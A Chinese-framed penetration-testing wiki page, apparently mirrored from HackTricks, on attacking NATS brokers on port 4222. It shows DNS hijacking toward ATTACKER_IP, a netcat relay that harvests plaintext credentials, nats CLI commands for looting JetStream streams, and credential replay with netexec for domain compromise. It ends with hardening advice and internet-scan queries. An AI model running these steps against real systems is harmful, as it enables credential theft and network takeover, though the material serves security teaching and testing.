---
title: "4222 - Nats"
weight: 4222
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **4222 - NATS** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> update add nats-svc.domain.local 60 A ATTACKER_IP
> send
```

+ Mirror the legitimate banner once, then replay it to every connecting client. NATS trusts the first `INFO` line it sees, so we only need to pipe it through a listener:

```bash
nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
```

+ As soon as an internal client resolves the hijacked name, it will emit a plaintext `CONNECT` frame containing the `user` / `pass` pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even `nc` is enough to harvest secrets.
+ For longer engagements, run the official server locally (`git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V`). TRACE logging already shows usernames; removing the redaction helper or sniffing traffic with Wireshark reveals the full password.

### JetStream looting & password hunting

Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping:

```bash
nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
```

JetStream discovery usually follows this pattern:

```bash
nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage
```

Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:

```json
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
```

Retained secrets can then be replayed against Kerberos-only services using `netexec smb DC01 -u USER -p PASS -k`, enabling full domain compromise.

### Hardening & detection

* **Enforce TLS** (`tls`, `tls_required`, or mTLS via `nkey`/`creds`). Without encryption, INFO/CONNECT leaks credentials to anyone on-path.
* **Pinpoint who can update DNS** – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed.
* **Disable credential logging**. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and apply `deny_delete=false` only to trusted operators.

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="4222"
```

#### Shodan

```bash
# Shodan 搜索语法
port:4222
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:4222
```

---

## 📖 参考资料

- [HackTricks - 4222-nats](https://book.hacktricks.wiki/en/network-services-pentesting/4222-nats.html)